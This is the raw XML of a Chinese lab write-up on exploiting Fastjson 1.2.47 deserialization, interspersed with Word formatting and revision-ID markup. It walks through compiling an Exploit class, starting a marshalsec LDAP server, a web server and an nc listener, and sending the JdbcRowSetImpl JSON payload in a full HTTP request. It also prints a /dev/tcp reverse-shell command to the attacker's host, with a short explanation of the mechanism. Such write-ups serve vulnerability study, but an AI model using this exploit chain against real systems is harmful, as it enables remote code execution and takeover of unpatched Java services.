        <w:t>2、修改Exploit.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1272540"/>
            <wp:effectExtent l="0" t="0" r="12065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使用命令javac Exploit.java 编译Exploit.java，生成Exploit.class文件</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4933950" cy="431800"/>
            <wp:effectExtent l="0" t="0" r="635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开启ldap服务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-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.96.129/#Exploit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5590"/>
            <wp:effectExtent l="0" t="0" r="9525" b="38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开启web服务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05300" cy="577850"/>
            <wp:effectExtent l="0" t="0" r="0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开启nc监听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24150" cy="463550"/>
            <wp:effectExtent l="0" t="0" r="635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bookmarkStart w:id="15" w:name="_Toc23299"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows10上执行操作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265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"a":{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"@type":"java.lang.Class",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"val":"com.sun.rowset.JdbcRowSetImpl"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"b":{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"@type":"com.sun.rowset.JdbcRowSetImpl",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"dataSourceName":"ldap://192.168.96.129:1389/Exploit",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"autoCommit":true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223135"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1206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6" w:name="_Toc26390"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上查看结果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成功反弹shell：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34260"/>
            <wp:effectExtent l="0" t="0" r="952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bookmarkStart w:id="17" w:name="_Toc30356"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞原理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615"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发起请求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当攻击者请求以下数据包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 HTTP/1.1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192.168.96.128:8090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x64; rv:81.0) Gecko/20100101 Firefox/81.0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text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8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zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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265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"a":{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"@type":"java.lang.Class",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"val":"com.sun.rowset.JdbcRowSetImpl"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"b":{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"@type":"com.sun.rowset.JdbcRowSetImpl",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"dataSourceName":"ldap://192.168.96.129:1389/Exploit",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"autoCommit":true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28603"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程调用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靶机（受害者）的com.sun.rowset.JdbcRowSetImpl 这个类在设置 autoCommit 的 setter 时会调用 connect 方法去连接 dataSourceName 指定的 jdbc 服务。 JNDI 常用的有 RMI 和 LDAP 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30283"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据转发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一旦靶机远程调用ldap://192.168.96.129:1389/Exploit，工具marshalsec-0.0.3-SNAPSHOT-all.jar会将该请求转发到攻击者的web服务（这里为：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"http://192.168.96.129/"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http://192.168.96.129/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）【root@kali:~/fastjson-1.2.47-RCE# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.96.129/#Exploit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Listening on 0.0.0.0:1389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LDAP reference result for Exploit redirecting to http://192.168.96.129/Exploit.class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13345"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞执行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靶机通过web服务获取到攻击者web目录下的Exploit.class文件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5250" cy="229235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最终靶机执行Exploit程序中的命令：/bin/bash -c $@|bash 0 echo bash -i &gt;&amp;/dev/tcp/192.168.96.129/4444 0&gt;&amp;1，反弹shell到攻击者。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2" w:name="_Toc3706"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22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"https://www.jianshu.com/p/124f06f4aace"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https://www.jianshu.com/p/124f06f4aace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B8DB11"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A7B8DB1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BB5FAE6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BBB5FAE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57B1B31"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D57B1B3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0618CBC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0618CB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22BF36C2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="22BF36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FA60C3B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2FA60C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A5A4A"/>
    <w:rsid w:val="008D1140"/>
    <w:rsid w:val="00C267A0"/>
    <w:rsid w:val="011115E7"/>
    <w:rsid w:val="015A15D3"/>
    <w:rsid w:val="01B23F8F"/>
    <w:rsid w:val="024C782A"/>
    <w:rsid w:val="03AB4619"/>
    <w:rsid w:val="03DD3211"/>
    <w:rsid w:val="03DF3726"/>
    <w:rsid w:val="05D54CF4"/>
    <w:rsid w:val="06CC7334"/>
    <w:rsid w:val="071664EC"/>
    <w:rsid w:val="0737237D"/>
    <w:rsid w:val="076E3C52"/>
    <w:rsid w:val="07991B2C"/>
    <w:rsid w:val="07FC3BD8"/>
    <w:rsid w:val="08854F49"/>
    <w:rsid w:val="08922118"/>
    <w:rsid w:val="09071781"/>
    <w:rsid w:val="09332336"/>
    <w:rsid w:val="09D84774"/>
    <w:rsid w:val="0ACA2F7C"/>
    <w:rsid w:val="0AD4012B"/>
    <w:rsid w:val="0ADF40FE"/>
    <w:rsid w:val="0B4D198B"/>
    <w:rsid w:val="0C0771F7"/>
    <w:rsid w:val="0C62451E"/>
    <w:rsid w:val="0C7D0343"/>
    <w:rsid w:val="0C9B2A7E"/>
    <w:rsid w:val="0CB766DC"/>
    <w:rsid w:val="0E596606"/>
    <w:rsid w:val="0E697317"/>
    <w:rsid w:val="0E97774C"/>
    <w:rsid w:val="0F17790D"/>
    <w:rsid w:val="0F43149D"/>
    <w:rsid w:val="0F9C00EC"/>
    <w:rsid w:val="0FAC751B"/>
    <w:rsid w:val="10DE70B9"/>
    <w:rsid w:val="10F37C66"/>
    <w:rsid w:val="10F94932"/>
    <w:rsid w:val="12026F7C"/>
    <w:rsid w:val="128F2913"/>
    <w:rsid w:val="13110476"/>
    <w:rsid w:val="132302E9"/>
    <w:rsid w:val="13BA5243"/>
    <w:rsid w:val="14405E90"/>
    <w:rsid w:val="14E77BEA"/>
    <w:rsid w:val="16A92EE7"/>
    <w:rsid w:val="17E94BC5"/>
    <w:rsid w:val="18BA21D5"/>
    <w:rsid w:val="18FB3249"/>
    <w:rsid w:val="195E278E"/>
    <w:rsid w:val="19F159A4"/>
    <w:rsid w:val="1F650118"/>
    <w:rsid w:val="1F6D50CB"/>
    <w:rsid w:val="209D3F8F"/>
    <w:rsid w:val="20C95685"/>
    <w:rsid w:val="218F701C"/>
    <w:rsid w:val="21EA147C"/>
    <w:rsid w:val="22046317"/>
    <w:rsid w:val="220A3EC1"/>
    <w:rsid w:val="22EF2B75"/>
    <w:rsid w:val="238B54C2"/>
    <w:rsid w:val="23C06D3A"/>
    <w:rsid w:val="23C20930"/>
    <w:rsid w:val="242F6501"/>
    <w:rsid w:val="24C040E4"/>
    <w:rsid w:val="25175FEE"/>
    <w:rsid w:val="25A8638A"/>
    <w:rsid w:val="25C908BE"/>
    <w:rsid w:val="26542E30"/>
    <w:rsid w:val="27624A86"/>
    <w:rsid w:val="290F05B7"/>
    <w:rsid w:val="29582F1E"/>
    <w:rsid w:val="2A101718"/>
    <w:rsid w:val="2A5647FE"/>
    <w:rsid w:val="2AEF6211"/>
    <w:rsid w:val="2C70549A"/>
    <w:rsid w:val="2CD95604"/>
    <w:rsid w:val="2D356A0D"/>
    <w:rsid w:val="2D7B6036"/>
    <w:rsid w:val="2EC33EB6"/>
    <w:rsid w:val="2F015C45"/>
    <w:rsid w:val="2FFA13F0"/>
    <w:rsid w:val="301E6E9D"/>
    <w:rsid w:val="30D21154"/>
    <w:rsid w:val="32B80CE4"/>
    <w:rsid w:val="33622E13"/>
    <w:rsid w:val="33840CD4"/>
    <w:rsid w:val="33A174D9"/>
    <w:rsid w:val="33F74D71"/>
    <w:rsid w:val="342921D6"/>
    <w:rsid w:val="34BA2E2C"/>
    <w:rsid w:val="35762A74"/>
    <w:rsid w:val="377065DC"/>
    <w:rsid w:val="37F96FC3"/>
    <w:rsid w:val="380A733A"/>
    <w:rsid w:val="38A874C3"/>
    <w:rsid w:val="38BD70EC"/>
    <w:rsid w:val="39285179"/>
    <w:rsid w:val="39EE7A24"/>
    <w:rsid w:val="39EF38ED"/>
    <w:rsid w:val="3CF0132C"/>
    <w:rsid w:val="3E225012"/>
    <w:rsid w:val="3E6C6624"/>
    <w:rsid w:val="3E832C76"/>
    <w:rsid w:val="3EB65B19"/>
    <w:rsid w:val="3F4C60EC"/>
    <w:rsid w:val="3FDE6A45"/>
    <w:rsid w:val="40D52BBE"/>
    <w:rsid w:val="40E15325"/>
    <w:rsid w:val="40F76629"/>
    <w:rsid w:val="416C6EBC"/>
    <w:rsid w:val="42D11A23"/>
    <w:rsid w:val="43277135"/>
    <w:rsid w:val="4347261B"/>
    <w:rsid w:val="435F4800"/>
    <w:rsid w:val="44D55CD6"/>
    <w:rsid w:val="4535236D"/>
    <w:rsid w:val="458C33EB"/>
    <w:rsid w:val="45C626CF"/>
    <w:rsid w:val="4666042D"/>
    <w:rsid w:val="46EA32AD"/>
    <w:rsid w:val="47023D74"/>
    <w:rsid w:val="470C175A"/>
    <w:rsid w:val="48E12BCD"/>
    <w:rsid w:val="4926624C"/>
    <w:rsid w:val="493376A0"/>
    <w:rsid w:val="4A595BAF"/>
    <w:rsid w:val="4BDE4FCE"/>
    <w:rsid w:val="4BE57110"/>
    <w:rsid w:val="4C0D12D9"/>
    <w:rsid w:val="4C9233BC"/>
    <w:rsid w:val="4CFE7FE0"/>
    <w:rsid w:val="4D9A5A21"/>
    <w:rsid w:val="4E2750C3"/>
    <w:rsid w:val="4E7466F5"/>
    <w:rsid w:val="4E923C5D"/>
    <w:rsid w:val="4EA3460F"/>
    <w:rsid w:val="4EDE4FEA"/>
    <w:rsid w:val="505E4E27"/>
    <w:rsid w:val="50631291"/>
    <w:rsid w:val="5073601A"/>
    <w:rsid w:val="508259C4"/>
    <w:rsid w:val="509E4EDF"/>
    <w:rsid w:val="50E83D9B"/>
    <w:rsid w:val="512701E3"/>
    <w:rsid w:val="514C492C"/>
    <w:rsid w:val="51F34FD6"/>
    <w:rsid w:val="525B4660"/>
    <w:rsid w:val="52B24E93"/>
    <w:rsid w:val="53DD5700"/>
    <w:rsid w:val="53E078AD"/>
    <w:rsid w:val="54077927"/>
    <w:rsid w:val="547F15B6"/>
    <w:rsid w:val="5515443E"/>
    <w:rsid w:val="572B06FA"/>
    <w:rsid w:val="58007A7D"/>
    <w:rsid w:val="58496E30"/>
    <w:rsid w:val="58686F78"/>
    <w:rsid w:val="588E0CA5"/>
    <w:rsid w:val="58BC280C"/>
    <w:rsid w:val="58FB714A"/>
    <w:rsid w:val="590D5D55"/>
    <w:rsid w:val="5A005784"/>
    <w:rsid w:val="5A3C51E8"/>
    <w:rsid w:val="5A690E45"/>
    <w:rsid w:val="5A7F2540"/>
    <w:rsid w:val="5CF50E9E"/>
    <w:rsid w:val="5D8F7A90"/>
    <w:rsid w:val="5DF14456"/>
    <w:rsid w:val="5E076B2E"/>
    <w:rsid w:val="5E321655"/>
    <w:rsid w:val="5ED401B2"/>
    <w:rsid w:val="5F5C310E"/>
    <w:rsid w:val="5F5E0371"/>
    <w:rsid w:val="60AC6972"/>
    <w:rsid w:val="627738F9"/>
    <w:rsid w:val="629C52B5"/>
    <w:rsid w:val="62CA5A4A"/>
    <w:rsid w:val="62E951CC"/>
    <w:rsid w:val="63066712"/>
    <w:rsid w:val="63AA75F3"/>
    <w:rsid w:val="63B97412"/>
    <w:rsid w:val="642F352A"/>
    <w:rsid w:val="643538F7"/>
    <w:rsid w:val="64D042D4"/>
    <w:rsid w:val="662968B1"/>
    <w:rsid w:val="671A4C22"/>
    <w:rsid w:val="67A41AFE"/>
    <w:rsid w:val="67E655C5"/>
    <w:rsid w:val="682667E9"/>
    <w:rsid w:val="68BA439B"/>
    <w:rsid w:val="695B041B"/>
    <w:rsid w:val="698B2344"/>
    <w:rsid w:val="6A3C03A6"/>
    <w:rsid w:val="6A457BB3"/>
    <w:rsid w:val="6A570B3D"/>
    <w:rsid w:val="6AA04318"/>
    <w:rsid w:val="6ADE3CDB"/>
    <w:rsid w:val="6B386C09"/>
    <w:rsid w:val="6BAB0B57"/>
    <w:rsid w:val="6CA92E4A"/>
    <w:rsid w:val="6D2F5FD5"/>
    <w:rsid w:val="6DC71144"/>
    <w:rsid w:val="6E511BD0"/>
    <w:rsid w:val="6F7C3E85"/>
    <w:rsid w:val="71FE1740"/>
    <w:rsid w:val="72A52EB8"/>
    <w:rsid w:val="74EE48F9"/>
    <w:rsid w:val="75981E36"/>
    <w:rsid w:val="77E76E0F"/>
    <w:rsid w:val="792E5817"/>
    <w:rsid w:val="7A19570C"/>
    <w:rsid w:val="7A406864"/>
    <w:rsid w:val="7A9120CA"/>
    <w:rsid w:val="7A933CCE"/>
    <w:rsid w:val="7A96191F"/>
    <w:rsid w:val="7B072C2C"/>
    <w:rsid w:val="7C9637F7"/>
    <w:rsid w:val="7E861DE4"/>
    <w:rsid w:val="7EC33ED3"/>
    <w:rsid w:val="7F1C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36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14"/>
      <w:ind w:left="575" w:hanging="575"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28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ind w:left="720" w:hanging="720"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:sz w:val="30"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="en-US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标题 1 字符"/>
    <w:link w:val="2"/>
    <w:qFormat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2020-10-27T01:48:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-27T06:18:23Z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